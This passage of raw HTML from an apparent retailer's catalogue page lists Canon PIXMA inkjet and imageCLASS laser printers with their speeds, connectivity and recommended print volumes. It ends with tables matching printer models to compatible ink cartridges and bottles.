:-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 